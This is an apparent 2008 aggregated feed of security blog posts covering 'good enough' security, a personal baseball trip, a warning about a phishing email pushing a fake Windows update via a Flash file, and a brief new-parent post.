Well off to Black Hat for some learning!

Revisiting the good enough generation [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

That's right, talkin' 'bout my, my g-g-g-generation. The generation where good enough is . . . good enough. There is no sense of being the best you can be or going over and above. Just enough to get it done is the way of the world. So with Rothman revisiting Big is the New Small, I thought another look at the good enough generation was in order. It was just over two years ago that I wrote the original "Is good enough security, good enough".

Now with hindsight it appears Mike and I were saying very close to the same thing. That the sad truth is that for most people having security that is good enough, is enough for them. Subsequently if the big guy has good enough, why bother with dealing with a multitude of vendors and tower of babel security infrastructure. So after all this time Mike is not entirely wrong.

However, I still believe that there is a percentage of the world that doesn't buy into the just good enough theory. For folks like that given the resources, being the best they can be is the way of the world. If I didn't believe that, I would not be as jazzed about building a company like StillSecure as I am.

Another fantasy fulfilled [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

My Grandmother always told me that a lucky person can count the really good friends they have on one hand, but a small number of good friends far outweighs having many acquaintances. That was proven to me once again this weekend. Ever since before I had my 2 sons, I had dreams of taking my children to both a Pittsburgh Steeler game and a NY Yankee game. Last year I had a chance to take Landon and Bradley to Pittsburgh and see a Steeler game. With this being the last year for the old Yankee Stadium, I wanted to take the boys to see the Yankees at home and in the old stadium.

Getting tickets to a game at Yankee Stadium is not cheap.  In looking around StubHub, for a hundred bucks a ticket (which is all I was willing to pay), the best I was going to do was out in the bleachers somewhere. But I figured it was better than nothing and was going to go for it.  That was when I called my best buddy from college Tyler to see if he wanted to go with us.  Tyler still lives in NY, actually he has an apt in Trump Palace and works in advertising for a large company, handling one of the very biggest accounts.  When I told him what I was looking at buying he said to hold on and let him see what he could do.

Well Tyler came through big time.  Not sure which vendor he got them from, but we had 6th row box seats behind third base, tickets to the Stadium Club, free parking (didn't use it as we took the subway) and to top it off, Tyler was staying at his friends place and insisted we stay in his place at Trump. 

The boys and I had a blast hanging out in the city, going to Dylan's candy store, the Empire State Building and then heading up to the Stadium.  I am sure it will be a time both they and I will never forget.  Like the commercial says:

1. 3 round trip airline tickets from Florida to NY – $750.00

2. 1 night in a hotel in NYC - $400.00

3. 3 field box seats to a Yankee game - $1000.00

4. A friend like Tyler to make it all happen for free (I used miles for the airfare) and give the kids this kind of memory – PRICELESS!

Thanks Tyler!

Windows Vista update through malware Flash swf file [mxlab - all about anti virus and anti spam]

Posted: 27 Aug 2008 01:06 PM CDT

An email with the subject “RE: ® Official Update 2008!” is trying to attract your attention to a new Windows XP/Vista update. The email message contains a large title “Free Update Windows XP, Vista” with a URL.

Following the link leads to a hosted .swf file, a Flash animation, that is hosted at

The file itself is of course malware so be aware not to follow the link, download or execute the install.exe file.

Things I Learned at 3am This Morning [The Falcon's View]

Posted: 27 Aug 2008 10:52 AM CDT

*yawn* Hi folks! Proud papa here, just providing some quick thoughts that I'm sure other parents will find amusing. We've survived our first night with a newborn. She apparently likes to sleep in the morning and stay up fussy all...
